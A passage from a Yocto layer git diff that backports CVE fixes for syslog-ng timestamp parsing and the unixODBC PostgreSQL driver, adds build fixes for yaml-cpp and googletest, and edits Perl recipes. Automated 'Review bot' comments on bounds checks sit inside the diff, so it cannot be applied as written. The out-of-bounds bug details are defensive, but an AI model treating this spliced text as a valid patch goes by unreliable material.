3) ++ const gsize abbrev_length = 3; ++ ++ if (*left < abbrev_length) + return FALSE; + + switch (**buf) + { + case 'S': +- if (strncasecmp(*buf, "Sun", 3) == 0) ++ if (strncasecmp(*buf, "Sun", abbrev_length) == 0) + *wday = 0; +- else if (strncasecmp(*buf, "Sat", 3) == 0) ++ else if (strncasecmp(*buf, "Sat", abbrev_length) == 0) + *wday = 6; + else + return FALSE; + break; + case 'M': +- if (strncasecmp(*buf, "Mon", 3) == 0) ++ if (strncasecmp(*buf, "Mon", abbrev_length) == 0) + *wday = 1; + else + return FALSE; + break; + case 'T': +- if (strncasecmp(*buf, "Tue", 3) == 0) ++ if (strncasecmp(*buf, "Tue", abbrev_length) == 0) + *wday = 2; +- else if (strncasecmp(*buf, "Thu", 3) == 0) ++ else if (strncasecmp(*buf, "Thu", abbrev_length) == 0) + *wday = 4; + else + return FALSE; + break; + case 'W': +- if (strncasecmp(*buf, "Wed", 3) == 0) ++ if (strncasecmp(*buf, "Wed", abbrev_length) == 0) + *wday = 3; + else + return FALSE; + break; + case 'F': +- if 
(strncasecmp(*buf, "Fri", 3) == 0) ++ if (strncasecmp(*buf, "Fri", abbrev_length) == 0) + *wday = 5; + else + return FALSE; +@@ -77,8 +79,8 @@ scan_day_abbrev(const gchar **buf, gint *left, gint *wday) + return FALSE; + } + +- (*buf) += 3; +- (*left) -= 3; ++ (*buf) += abbrev_length; ++ (*left) -= abbrev_length; + return TRUE; + } + +@@ -87,63 +89,65 @@ scan_month_abbrev(const gchar **buf, gint *left, gint *mon) + { + *mon = -1; + +- if (*left < 3) ++ const gsize abbrev_length = 3; ++ ++ if (*left < abbrev_length) + return FALSE; + + switch (**buf) + { + case 'J': +- if (strncasecmp(*buf, "Jan", 3) == 0) ++ if (strncasecmp(*buf, "Jan", abbrev_length) == 0) + *mon = 0; +- else if (strncasecmp(*buf, "Jun", 3) == 0) ++ else if (strncasecmp(*buf, "Jun", abbrev_length) == 0) + *mon = 5; +- else if (strncasecmp(*buf, "Jul", 3) == 0) ++ else if (strncasecmp(*buf, "Jul", abbrev_length) == 0) + *mon = 6; + else + return FALSE; + break; + case 'F': +- if (strncasecmp(*buf, "Feb", 3) == 0) ++ if (strncasecmp(*buf, "Feb", abbrev_length) == 0) + *mon = 1; + else + return FALSE; + break; + case 'M': +- if (strncasecmp(*buf, "Mar", 3) == 0) ++ if (strncasecmp(*buf, "Mar", abbrev_length) == 0) + *mon = 2; +- else if (strncasecmp(*buf, "May", 3) == 0) ++ else if (strncasecmp(*buf, "May", abbrev_length) == 0) + *mon = 4; + else + return FALSE; + break; + case 'A': +- if (strncasecmp(*buf, "Apr", 3) == 0) ++ if (strncasecmp(*buf, "Apr", abbrev_length) == 0) + *mon = 3; +- else if (strncasecmp(*buf, "Aug", 3) == 0) ++ else if (strncasecmp(*buf, "Aug", abbrev_length) == 0) + *mon = 7; + else + return FALSE; + break; + case 'S': +- if (strncasecmp(*buf, "Sep", 3) == 0) ++ if (strncasecmp(*buf, "Sep", abbrev_length) == 0) + *mon = 8; + else + return FALSE; + break; + case 'O': +- if (strncasecmp(*buf, "Oct", 3) == 0) ++ if (strncasecmp(*buf, "Oct", abbrev_length) == 0) + *mon = 9; + else + return FALSE; + break; + case 'N': +- if (strncasecmp(*buf, "Nov", 3) == 0) ++ if 
(strncasecmp(*buf, "Nov", abbrev_length) == 0) + *mon = 10; + else + return FALSE; + break; + case 'D': +- if (strncasecmp(*buf, "Dec", 3) == 0) ++ if (strncasecmp(*buf, "Dec", abbrev_length) == 0) + *mon = 11; + else + return FALSE; +@@ -152,8 +156,8 @@ scan_month_abbrev(const gchar **buf, gint *left, gint *mon) + return FALSE; + } + +- (*buf) += 3; +- (*left) -= 3; ++ (*buf) += abbrev_length; ++ (*left) -= abbrev_length; + return TRUE; + } + +-- +2.34.1 + diff --git a/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0007.patch b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0007.patch new file mode 100644 index 0000000000..abb36fdf5f --- /dev/null +++ b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0007.patch 
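Review bot: Declaring `const gsize abbrev_length = 3;` changes `if (*left < abbrev_length)` from a signed into an unsigned comparison, in both `scan_day_abbrev` and `scan_month_abbrev`. `*left` is a `gint`, so a negative value is converted to a large unsigned number, passes the check, and `strncasecmp` then reads from `*buf`, whereas the old `*left < 3` returned FALSE in that case. The commit is described as only naming a constant, so this weakening of the length guard looks unintended. `const gint abbrev_length = 3;` keeps the original semantics and also avoids the mixed-sign arithmetic in `(*left) -= abbrev_length;`. Whether callers can pass a negative `*left` is not visible in the hunk.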
@@ -0,0 +1,81 @@ +From 8c6e2c1c41b0fcc5fbd464c35f4dac7102235396 Mon Sep 17 00:00:00 2001 +From: Laszlo Varady <laszlo.varady@protonmail.com> +Date: Sat, 20 Aug 2022 14:30:22 +0200 +Subject: [PATCH 7/8] timeutils: fix invalid calculation of ISO timestamp length +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +CVE: CVE-2022-38725 + +Upstream-Status: Backport +[https://github.com/syslog-ng/syslog-ng/commit/8c6e2c1c41b0fcc5fbd464c35f4dac7102235396] + +Signed-off-by: László Várady <laszlo.varady@protonmail.com> + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + lib/timeutils/scan-timestamp.c | 8 ++++++-- + lib/timeutils/tests/test_scan-timestamp.c | 7 +++++++ + 2 files changed, 13 insertions(+), 2 deletions(-) + +diff --git a/lib/timeutils/scan-timestamp.c b/lib/timeutils/scan-timestamp.c +index d22d50973..125264677 100644 +--- a/lib/timeutils/scan-timestamp.c ++++ b/lib/timeutils/scan-timestamp.c +@@ -350,19 +350,21 @@ __parse_usec(const guchar **data, gint *length) + static gboolean + __has_iso_timezone(const guchar *src, gint length) + { +- return (length >= 5) && ++ return (length >= 6) && + (*src == '+' || *src == '-') && + isdigit(*(src+1)) && + isdigit(*(src+2)) && + *(src+3) == ':' && + isdigit(*(src+4)) && + isdigit(*(src+5)) && +- !isdigit(*(src+6)); ++ (length < 7 || !isdigit(*(src+6))); + } + + static guint32 + __parse_iso_timezone(const guchar **data, gint *length) + { ++ g_assert(*length >= 6); ++ + gint hours, mins; + const guchar *src = *data; + guint32 tz = 0; +@@ -372,8 +374,10 @@ __parse_iso_timezone(const guchar **data, gint *length) + hours = (*(src + 1) - '0') * 10 + *(src + 2) - '0'; + mins = (*(src + 4) - '0') * 10 + *(src + 5) - '0'; + tz = sign * (hours * 3600 + mins * 60); ++ + src += 6; + (*length) -= 6; ++ + *data = src; + return tz; + } +diff --git a/lib/timeutils/tests/test_scan-timestamp.c b/lib/timeutils/tests/test_scan-timestamp.c +index 468bbf779..d18bdc65d 100644 +--- 
a/lib/timeutils/tests/test_scan-timestamp.c ++++ b/lib/timeutils/tests/test_scan-timestamp.c +@@ -264,6 +264,13 @@ Test(parse_timestamp, non_zero_terminated_rfc5424_input_is_handled_properly) + + } + ++Test(parse_timestamp, non_zero_terminated_rfc5424_timestamp_only) ++{ ++ const gchar *ts = "2022-08-17T05:02:28.417+03:00"; ++ gint ts_len = strlen(ts); ++ _expect_rfc5424_timestamp_len_eq(ts, ts_len, ts); ++} ++ + + Test(parse_timestamp, daylight_saving_behavior_at_spring_with_explicit_timezones) + { +-- +2.34.1 + diff --git a/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0008.patch b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0008.patch new file mode 100644 index 0000000000..56c71e8a21 --- /dev/null +++ b/meta-oe/recipes-support/syslog-ng/files/CVE-2022-38725-0008.patch 
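Review bot: `g_assert(*length >= 6)` is the only bounds check in `__parse_iso_timezone` before it reads `src + 1` through `src + 5`, and an assertion is a weak guard for input-derived lengths. GLib compiles `g_assert` out when `G_DISABLE_ASSERT` is defined, and where it is active a violated precondition aborts the process instead of rejecting the message. If the intent is that every caller has already passed `__has_iso_timezone()`, that contract should be stated at the function, e.g. `/* precondition: __has_iso_timezone(*data, *length) returned TRUE */`. The callers are outside the hunk, so this could not be confirmed here.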
@@ -0,0 +1,45 @@ +From 56f881c5eaa3d8c02c96607c4b9e4eaf959a044d Mon Sep 17 00:00:00 2001 +From: Laszlo Varady <laszlo.varady@protonmail.com> +Date: Sat, 20 Aug 2022 14:30:51 +0200 +Subject: [PATCH 8/8/] timeutils: fix out-of-bounds reading of data buffer +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +CVE: CVE-2022-38725 + +Upstream-Status: Backport +[https://github.com/syslog-ng/syslog-ng/commit/56f881c5eaa3d8c02c96607c4b9e4eaf959a044d] + +Signed-off-by: László Várady <laszlo.varady@protonmail.com> + +Signed-off-by: Yogita Urade <yogita.urade@windriver.com> +--- + lib/timeutils/scan-timestamp.c | 4 ++-- + 1 file changed, 2 insertions(+), 2 deletions(-) + +diff --git a/lib/timeutils/scan-timestamp.c b/lib/timeutils/scan-timestamp.c +index 125264677..c00d8e6a9 100644 +--- a/lib/timeutils/scan-timestamp.c ++++ b/lib/timeutils/scan-timestamp.c +@@ -431,7 +431,7 @@ __parse_bsd_timestamp(const guchar **data, gint *length, WallClockTime *wct) + if (!scan_pix_timestamp((const gchar **) &src, &left, wct)) + return FALSE; + +- if (*src == ':') ++ if (left && *src == ':') + { + src++; + left--; +@@ -482,7 +482,7 @@ scan_rfc3164_timestamp(const guchar **data, gint *length, WallClockTime *wct) + * looking at you, skip that as well, so we can reliably detect IPv6 + * addresses as hostnames, which would be using ":" as well. */ + +- if (*src == ':') ++ if (left && *src == ':') + { + ++src; + --left; +-- +2.34.1 + diff --git a/meta-oe/recipes-support/syslog-ng/syslog-ng_3.36.1.bb b/meta-oe/recipes-support/syslog-ng/syslog-ng_3.36.1.bb index 40bbfe495a..045b9b71c9 100644 --- a/meta-oe/recipes-support/syslog-ng/syslog-ng_3.36.1.bb +++ b/meta-oe/recipes-support/syslog-ng/syslog-ng_3.36.1.bb 
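Review bot: `if (left && *src == ':')`, added in `__parse_bsd_timestamp` and again in `scan_rfc3164_timestamp`, treats any non-zero `left` as readable, so a negative remaining length would still reach the `*src` dereference. The declaration of `left` is outside both hunks; if it is a signed `gint` like the `length` parameters, `if (left > 0 && *src == ':')` states the bound exactly and costs nothing. Both enclosing functions start and end outside the hunk, so whether `left` can actually go negative after `scan_pix_timestamp` cannot be confirmed from here.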
@@ -22,6 +22,14 @@ SRC_URI = "https://github.com/balabit/syslog-ng/releases/download/${BP}/${BP}.ta file://volatiles.03_syslog-ng \ file://syslog-ng-tmp.conf \ file://syslog-ng.service-the-syslog-ng-service.patch \ + file://CVE-2022-38725-0001.patch \ + file://CVE-2022-38725-0002.patch \ + file://CVE-2022-38725-0003.patch \ + file://CVE-2022-38725-0004.patch \ + file://CVE-2022-38725-0005.patch \ + file://CVE-2022-38725-0006.patch \ + file://CVE-2022-38725-0007.patch \ + file://CVE-2022-38725-0008.patch \ " SRC_URI[sha256sum] = "90a25c9767fe749db50f118ddfc92ec71399763d2ecd5ad4f11ff5eea049e60b" diff --git a/meta-oe/recipes-support/unixodbc/files/CVE-2024-1013.patch b/meta-oe/recipes-support/unixodbc/files/CVE-2024-1013.patch new file mode 100644 index 0000000000..7d37ad6042 --- /dev/null +++ b/meta-oe/recipes-support/unixodbc/files/CVE-2024-1013.patch 
@@ -0,0 +1,53 @@ +From 45f501e1be2db6b017cc242c79bfb9de32b332a1 Mon Sep 17 00:00:00 2001 +From: Florian Weimer <fweimer@redhat.com> +Date: Mon, 29 Jan 2024 08:27:29 +0100 +Subject: [PATCH] PostgreSQL driver: Fix incompatible pointer-to-integer types + +These result in out-of-bounds stack writes on 64-bit architectures +(caller has 4 bytes, callee writes 8 bytes), and seem to have gone +unnoticed on little-endian architectures (although big-endian +architectures must be broken). + +This change is required to avoid a build failure with GCC 14. + +CVE: CVE-2024-1013 + +Upstream-Status: Backport [https://github.com/lurcher/unixODBC/commit/45f501e1be2db6b017cc242c79bfb9de32b332a1] + +Signed-off-by: Soumya Sambu <soumya.sambu@windriver.com> +--- + Drivers/Postgre7.1/info.c | 6 +++--- + 1 file changed, 3 insertions(+), 3 deletions(-) + +diff --git a/Drivers/Postgre7.1/info.c b/Drivers/Postgre7.1/info.c +index 63ac91f..2216ecd 100755 +--- a/Drivers/Postgre7.1/info.c ++++ b/Drivers/Postgre7.1/info.c +@@ -1779,14 +1779,14 @@ char *table_name; + char index_name[MAX_INFO_STRING]; + short fields_vector[8]; + char isunique[10], isclustered[10]; +-SDWORD index_name_len, fields_vector_len; ++SQLLEN index_name_len, fields_vector_len; + TupleNode *row; + int i; + HSTMT hcol_stmt; + StatementClass *col_stmt, *indx_stmt; + char column_name[MAX_INFO_STRING], relhasrules[MAX_INFO_STRING]; + char **column_names = 0; +-Int4 column_name_len; ++SQLLEN column_name_len; + int total_columns = 0; + char error = TRUE; + ConnInfo *ci; +@@ -2136,7 +2136,7 @@ HSTMT htbl_stmt; + StatementClass *tbl_stmt; + char tables_query[STD_STATEMENT_LEN]; + char attname[MAX_INFO_STRING]; +-SDWORD attname_len; ++SQLLEN attname_len; + char pktab[MAX_TABLE_LEN + 1]; + Int2 result_cols; + +-- +2.40.0 diff --git a/meta-oe/recipes-support/unixodbc/unixodbc_2.3.9.bb b/meta-oe/recipes-support/unixodbc/unixodbc_2.3.9.bb index c194739cb1..283546cf0e 100644 --- a/meta-oe/recipes-support/unixodbc/unixodbc_2.3.9.bb 
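Review bot: The widening to `SQLLEN` is applied declaration by declaration (`index_name_len`, `fields_vector_len`, `column_name_len`, `attname_len`), and the calls that receive the addresses of these variables are outside the hunk, so nothing here shows that every length-out variable in `Drivers/Postgre7.1/info.c` was covered. Since the commit message says GCC 14 rejects the old code, building the driver once with `-Werror=incompatible-pointer-types` on the toolchain this branch uses would surface any remaining 4-byte variables passed where 8 bytes are written. Later uses of the widened variables that assume 32 bits (format strings, assignments into `Int4`) are also worth a look; the enclosing functions start and end outside the hunk.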
+++ b/meta-oe/recipes-support/unixodbc/unixodbc_2.3.9.bb @@ -10,6 +10,7 @@ DEPENDS = "libtool readline" SRC_URI = "http://ftp.unixodbc.org/unixODBC-${PV}.tar.gz \ file://do-not-use-libltdl-source-directory.patch \ + file://CVE-2024-1013.patch \ " SRC_URI[sha256sum] = "52833eac3d681c8b0c9a5a65f2ebd745b3a964f208fc748f977e44015a31b207" diff --git a/meta-oe/recipes-support/yaml-cpp/yaml-cpp/0001-Fix-CMake-export-files-1077.patch b/meta-oe/recipes-support/yaml-cpp/yaml-cpp/0001-Fix-CMake-export-files-1077.patch new file mode 100644 index 0000000000..b6c4a3b883 --- /dev/null +++ b/meta-oe/recipes-support/yaml-cpp/yaml-cpp/0001-Fix-CMake-export-files-1077.patch 
@@ -0,0 +1,117 @@ +From 3d436f6cfc2dfe52fc1533c01f57c25ae7ffac9c Mon Sep 17 00:00:00 2001 +From: Felix Schwitzer <flx107809@gmail.com> +Date: Fri, 1 Apr 2022 05:26:47 +0200 +Subject: [PATCH] Fix CMake export files (#1077) + +After configuring the file `yaml-cpp-config.cmake.in`, the result ends up with +empty variables. (see also the discussion in #774). + +Rework this file and the call to `configure_package_config_file` according the +cmake documentation +(https://cmake.org/cmake/help/v3.22/module/CMakePackageConfigHelpers.html?highlight=configure_package_config#command:configure_package_config_file) +to overcome this issue and allow a simple `find_package` after install. + +As there was some discussion about the place where to install the +`yaml-cpp-config.cmake` file, e.g. #1055, factor out the install location into +an extra variable to make it easier changing this location in the future. + +Also untabify CMakeLists.txt in some places to align with the other code parts in this file. + +Upstream-Status: Accepted [https://github.com/jbeder/yaml-cpp/pull/1077] + +Signed-off-by: Jasper Orschulko <jasper@fancydomain.eu> +--- + CMakeLists.txt | 29 ++++++++++++++++++----------- + yaml-cpp-config.cmake.in | 10 ++++++---- + 2 files changed, 24 insertions(+), 15 deletions(-) + +diff --git a/CMakeLists.txt b/CMakeLists.txt +index b230b9e..983d1a4 100644 +--- a/CMakeLists.txt ++++ b/CMakeLists.txt +@@ -127,10 +127,16 @@ set_target_properties(yaml-cpp PROPERTIES + PROJECT_LABEL "yaml-cpp ${yaml-cpp-label-postfix}" + DEBUG_POSTFIX "${CMAKE_DEBUG_POSTFIX}") + ++# FIXME(felix2012): A more common place for the cmake export would be ++# `CMAKE_INSTALL_LIBDIR`, as e.g. 
done in ubuntu or in this project for GTest ++set(CONFIG_EXPORT_DIR "${CMAKE_INSTALL_DATADIR}/cmake/yaml-cpp") ++set(EXPORT_TARGETS yaml-cpp) + configure_package_config_file( + "${PROJECT_SOURCE_DIR}/yaml-cpp-config.cmake.in" + "${PROJECT_BINARY_DIR}/yaml-cpp-config.cmake" +- INSTALL_DESTINATION "${CMAKE_INSTALL_DATADIR}/cmake/yaml-cpp") ++ INSTALL_DESTINATION "${CONFIG_EXPORT_DIR}" ++ PATH_VARS CMAKE_INSTALL_INCLUDEDIR CONFIG_EXPORT_DIR) ++unset(EXPORT_TARGETS) + + write_basic_package_version_file( + "${PROJECT_BINARY_DIR}/yaml-cpp-config-version.cmake" +@@ -139,30 +145,31 @@ write_basic_package_version_file( + configure_file(yaml-cpp.pc.in yaml-cpp.pc @ONLY) + + if (YAML_CPP_INSTALL) +- install(TARGETS yaml-cpp ++ install(TARGETS yaml-cpp + EXPORT yaml-cpp-targets + RUNTIME DESTINATION ${CMAKE_INSTALL_BINDIR} + LIBRARY DESTINATION ${CMAKE_INSTALL_LIBDIR} + ARCHIVE DESTINATION ${CMAKE_INSTALL_LIBDIR}) +- install(DIRECTORY ${PROJECT_SOURCE_DIR}/include/ ++ install(DIRECTORY ${PROJECT_SOURCE_DIR}/include/ + DESTINATION ${CMAKE_INSTALL_INCLUDEDIR} +- FILES_MATCHING PATTERN "*.h") ++ FILES_MATCHING PATTERN "*.h") + install(EXPORT yaml-cpp-targets +- DESTINATION "${CMAKE_INSTALL_DATADIR}/cmake/yaml-cpp") +- install(FILES +- "${PROJECT_BINARY_DIR}/yaml-cpp-config.cmake" +- "${PROJECT_BINARY_DIR}/yaml-cpp-config-version.cmake" +- DESTINATION "${CMAKE_INSTALL_DATADIR}/cmake/yaml-cpp") ++ DESTINATION "${CONFIG_EXPORT_DIR}") ++ install(FILES ++ "${PROJECT_BINARY_DIR}/yaml-cpp-config.cmake" ++ "${PROJECT_BINARY_DIR}/yaml-cpp-config-version.cmake" ++ DESTINATION "${CONFIG_EXPORT_DIR}") + install(FILES "${PROJECT_BINARY_DIR}/yaml-cpp.pc" + DESTINATION ${CMAKE_INSTALL_DATADIR}/pkgconfig) + endif() ++unset(CONFIG_EXPORT_DIR) + + if(YAML_CPP_BUILD_TESTS) +- add_subdirectory(test) ++ add_subdirectory(test) + endif() + + if(YAML_CPP_BUILD_TOOLS) +- add_subdirectory(util) ++ add_subdirectory(util) + endif() + + if (YAML_CPP_CLANG_FORMAT_EXE) +diff --git a/yaml-cpp-config.cmake.in 
b/yaml-cpp-config.cmake.in +index 7b41e3f..a7ace3d 100644 +--- a/yaml-cpp-config.cmake.in ++++ b/yaml-cpp-config.cmake.in +@@ -3,12 +3,14 @@ + # YAML_CPP_INCLUDE_DIR - include directory + # YAML_CPP_LIBRARIES - libraries to link against + +-# Compute paths +-get_filename_component(YAML_CPP_CMAKE_DIR "${CMAKE_CURRENT_LIST_FILE}" PATH) +-set(YAML_CPP_INCLUDE_DIR "@CONFIG_INCLUDE_DIRS@") ++@PACKAGE_INIT@ ++ ++set_and_check(YAML_CPP_INCLUDE_DIR "@PACKAGE_CMAKE_INSTALL_INCLUDEDIR@") + + # Our library dependencies (contains definitions for IMPORTED targets) +-include("${YAML_CPP_CMAKE_DIR}/yaml-cpp-targets.cmake") ++include(@PACKAGE_CONFIG_EXPORT_DIR@/yaml-cpp-targets.cmake) + + # These are IMPORTED targets created by yaml-cpp-targets.cmake + set(YAML_CPP_LIBRARIES "@EXPORT_TARGETS@") ++ ++check_required_components(@EXPORT_TARGETS@) +-- +2.39.2 + diff --git a/meta-oe/recipes-support/yaml-cpp/yaml-cpp_0.7.0.bb b/meta-oe/recipes-support/yaml-cpp/yaml-cpp_0.7.0.bb index d3984abe8b..e04d4705a4 100644 --- a/meta-oe/recipes-support/yaml-cpp/yaml-cpp_0.7.0.bb +++ b/meta-oe/recipes-support/yaml-cpp/yaml-cpp_0.7.0.bb @@ -8,6 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=6a8aaf0595c2efc1a9c2e0913e9c1a2c" # yaml-cpp releases are stored as archive files in github. # download the exact revision of release SRC_URI = "git://github.com/jbeder/yaml-cpp.git;branch=master;protocol=https" +SRC_URI += "file://0001-Fix-CMake-export-files-1077.patch" SRCREV = "0579ae3d976091d7d664aa9d2527e0d0cff25763" S = "${WORKDIR}/git" diff --git a/meta-oe/recipes-test/googletest/files/0001-work-around-GCC-6-11-ADL-bug.patch b/meta-oe/recipes-test/googletest/files/0001-work-around-GCC-6-11-ADL-bug.patch new file mode 100644 index 0000000000..c2828e6a94 --- /dev/null +++ b/meta-oe/recipes-test/googletest/files/0001-work-around-GCC-6-11-ADL-bug.patch 
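Review bot: `include(@PACKAGE_CONFIG_EXPORT_DIR@/yaml-cpp-targets.cmake)` in `yaml-cpp-config.cmake.in` drops the quotes that the removed `include("${YAML_CPP_CMAKE_DIR}/yaml-cpp-targets.cmake")` had, so an install prefix containing spaces or semicolons would be split into several arguments when the generated config file is loaded. Quoting it as `include("@PACKAGE_CONFIG_EXPORT_DIR@/yaml-cpp-targets.cmake")` keeps the previous behaviour. `check_required_components(@EXPORT_TARGETS@)` is fine unquoted as long as the value stays the single name `yaml-cpp` set in `CMakeLists.txt`.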
@@ -0,0 +1,42 @@ +From 8c70e2680bec526012d96578160901e4c24e1c48 Mon Sep 17 00:00:00 2001 +From: Paul Groke <paul.groke@dynatrace.com> +Date: Thu, 15 Sep 2022 13:36:49 +0200 +Subject: [PATCH] work around GCC 6~11 ADL bug + +see https://gcc.gnu.org/bugzilla/show_bug.cgi?id=51577 +ADL seems to work properly when we do the SFINAE check via the return type, but not when using a dummy template parameter + +fix #3992 +Upstream-Status: Backport [https://github.com/google/googletest/pull/3993/commits/096014a45dc38dff993f5b7bb28a258d8323344b] +Signed-off-by: Paul Groke <paul.groke@dynatrace.com> +Signed-off-by: Sana Kazi <sana.kazi@kpit.com> +--- + googletest/include/gtest/gtest-printers.h | 13 +++++++------ + 1 file changed, 7 insertions(+), 6 deletions(-) + +diff --git a/googletest/include/gtest/gtest-printers.h b/googletest/include/gtest/gtest-printers.h +index 8e4d295344..19c3e0b69b 100644 +--- a/googletest/include/gtest/gtest-printers.h ++++ b/googletest/include/gtest/gtest-printers.h +@@ -205,12 +205,13 @@ struct StreamPrinter { + // Don't accept member pointers here. We'd print them via implicit + // conversion to bool, which isn't useful. + typename = typename std::enable_if< +- !std::is_member_pointer<T>::value>::type, +- // Only accept types for which we can find a streaming operator via +- // ADL (possibly involving implicit conversions). +- typename = decltype(std::declval<std::ostream&>() +- << std::declval<const T&>())> +- static void PrintValue(const T& value, ::std::ostream* os) { ++ !std::is_member_pointer<T>::value>::type> ++ // Only accept types for which we can find a streaming operator via ++ // ADL (possibly involving implicit conversions). ++ // (Use SFINAE via return type, because it seems GCC < 12 doesn't handle name ++ // lookup properly when we do it in the template parameter list.) 
++ static auto PrintValue(const T& value, ::std::ostream* os) ++ -> decltype((void)(*os << value)) { + // Call streaming operator found by ADL, possibly with implicit conversions + // of the arguments. + *os << value; +-- +2.25.1 diff --git a/meta-oe/recipes-test/googletest/googletest_git.bb b/meta-oe/recipes-test/googletest/googletest_git.bb index 869c2c86b6..917a68e95b 100644 --- a/meta-oe/recipes-test/googletest/googletest_git.bb +++ b/meta-oe/recipes-test/googletest/googletest_git.bb @@ -10,7 +10,8 @@ PROVIDES += "gmock gtest" S = "${WORKDIR}/git" SRCREV = "9e712372214d75bb30ec2847a44bf124d48096f3" -SRC_URI = "git://github.com/google/googletest.git;branch=main;protocol=https" +SRC_URI = "git://github.com/google/googletest.git;branch=main;protocol=https \ + file://0001-work-around-GCC-6-11-ADL-bug.patch " inherit cmake diff --git a/meta-perl/recipes-perl/libconfig/libconfig-autoconf-perl_0.319.bb b/meta-perl/recipes-perl/libconfig/libconfig-autoconf-perl_0.319.bb index 5db0bb4269..5c3701f16b 100644 --- a/meta-perl/recipes-perl/libconfig/libconfig-autoconf-perl_0.319.bb +++ b/meta-perl/recipes-perl/libconfig/libconfig-autoconf-perl_0.319.bb @@ -38,4 +38,4 @@ S = "${WORKDIR}/Config-AutoConf-${PV}" inherit cpan ptest-perl -BBCLASSEXTEND = "native nativesdk" +BBCLASSEXTEND = "native" diff --git a/meta-perl/recipes-perl/libcrypt/files/0001-Fix-for-Issue-31.patch b/meta-perl/recipes-perl/libcrypt/files/0001-Fix-for-Issue-31.patch deleted file mode 100644 index a5ea43f88b..0000000000 --- a/meta-perl/recipes-perl/libcrypt/files/0001-Fix-for-Issue-31.patch +++ /dev/null 
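Review bot: The patch header's `From 8c70e2680bec526012d96578160901e4c24e1c48` and the `Upstream-Status: Backport` URL, which points at commit `096014a45dc38dff993f5b7bb28a258d8323344b` inside pull request 3993, name different commits, and a commit that exists only in a pull request can be rebased or dropped, which makes the provenance of this change harder to verify later. If the change was merged, the header should reference the commit on googletest's main branch, `Upstream-Status: Backport [<merged-commit-url>]`; if it was not merged when this was written, `Submitted` with the pull-request URL describes it more accurately. The code change itself is confined to `StreamPrinter::PrintValue`, whose enclosing struct starts outside the hunk.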
@@ -1,37 +0,0 @@ -From 5e8202458e41ba1f7801746c503fe7c60ae340d5 Mon Sep 17 00:00:00 2001 -From: kambe-mikb <77083885+kambe-mikb@users.noreply.github.com> -Date: Tue, 28 Sep 2021 17:40:18 +1000 -Subject: [PATCH] Fix for Issue 31 - -Fix Issue 31 by removing reference to RSA_SSLV23_PADDING (removed from OpenSSL starting from v3.0.0) - -Upstream-Status: Submitted [https://github.com/toddr/Crypt-OpenSSL-RSA/pull/32] -Signed-off-by: Khem Raj <raj.khem@gmail.com> ---- - RSA.xs | 4 ++++ - 1 file changed, 4 insertions(+) - -diff --git a/RSA.xs b/RSA.xs -index 46cb199..4f65dfc 100644 ---- a/RSA.xs -+++ b/RSA.xs -@@ -640,12 +640,16 @@ use_pkcs1_oaep_padding(p_rsa) - CODE: - p_rsa->padding = RSA_PKCS1_OAEP_PADDING; - -+#if OPENSSL_VERSION_NUMBER < 0x30000000L -+ - void - use_sslv23_padding(p_rsa) - rsaData* p_rsa; - CODE: - p_rsa->padding = RSA_SSLV23_PADDING; - -+#endif -+ - # Sign text. Returns the signature. - - SV* --- -2.33.1 - diff --git a/meta-perl/recipes-perl/libcrypt/libcrypt-openssl-rsa-perl_0.32.bb b/meta-perl/recipes-perl/libcrypt/libcrypt-openssl-rsa-perl_0.33.bb index fd92c8a8db..aa8d138f2c 100644 --- a/meta-perl/recipes-perl/libcrypt/libcrypt-openssl-rsa-perl_0.32.bb +++ b/meta-perl/recipes-perl/libcrypt/libcrypt-openssl-rsa-perl_0.33.bb @@ -4,10 +4,9 @@ LICENSE = "Artistic-1.0 | GPL-1.0-or-later" LIC_FILES_CHKSUM = "file://LICENSE;md5=a67ceecc5d9a91a5a0d003ba50c26346" SRC_URI = "http://www.cpan.org/modules/by-module/Crypt/Crypt-OpenSSL-RSA-${PV}.tar.gz \ - file://0001-Fix-for-Issue-31.patch \ " -SRC_URI[sha256sum] = "adc74f0ae125c77f65d5dd32abb9c3429300a79543bf263494f333f9c0b62a61" +SRC_URI[sha256sum] = "bdbe630f6d6f540325746ad99977272ac8664ff81bd19f0adaba6d6f45efd864" DEPENDS += "libcrypt-openssl-guess-perl-native openssl" diff --git a/meta-perl/recipes-perl/libio/libio-socket-ssl-perl_2.074.bb b/meta-perl/recipes-perl/libio/libio-socket-ssl-perl_2.074.bb index 6249fd1d78..6e04e40dcf 100644 --- a/meta-perl/recipes-perl/libio/libio-socket-ssl-perl_2.074.bb 
+++ b/meta-perl/recipes-perl/libio/libio-socket-ssl-perl_2.074.bb @@ -42,5 +42,3 @@ do_install_ptest () { cp -r ${B}/t ${D}${PTEST_PATH} cp -r ${B}/certs ${D}${PTEST_PATH} } - -BBCLASSEXTEND = "native" diff --git a/meta-perl/recipes-perl/libnet/libnet-dns-perl_1.33.bb b/meta-perl/recipes-perl/libnet/libnet-dns-perl_1.33.bb index 2c7d793a7b..c768d64e32 100644 --- a/meta-perl/recipes-perl/libnet/libnet-dns-perl_1.33.bb +++ b/meta-perl/recipes-perl/libnet/libnet-dns-perl_1.33.bb @@ -61,5 +61,3 @@ python __anonymous () { raise bb.parse.SkipRecipe("incompatible with %s C library" % d.getVar('TCLIBC')) } - -BBCLASSEXTEND = "native" diff --git a/meta-perl/recipes-perl/libnet/libnet-ldap-perl_0.68.bb b/meta-perl/recipes-perl/libnet/libnet-ldap-perl_0.68.bb index dcc5ea88b1..a77381dce8 100644 --- a/meta-perl/recipes-perl/libnet/libnet-ldap-perl_0.68.bb +++ b/meta-perl/recipes-perl/libnet/libnet-ldap-perl_0.68.bb @@ -41,5 +41,3 @@ RDEPENDS:${PN}-ptest += " \ perl-module-perlio \ perl-module-test-more \ " - -BBCLASSEXTEND = "native" diff --git a/meta-perl/recipes-perl/libstatgrab/libunix-statgrab_0.112.bb b/meta-perl/recipes-perl/libstatgrab/libunix-statgrab_0.112.bb index c568ade997..01261d547a 100644 --- a/meta-perl/recipes-perl/libstatgrab/libunix-statgrab_0.112.bb +++ b/meta-perl/recipes-perl/libstatgrab/libunix-statgrab_0.112.bb @@ -36,5 +36,3 @@ S = 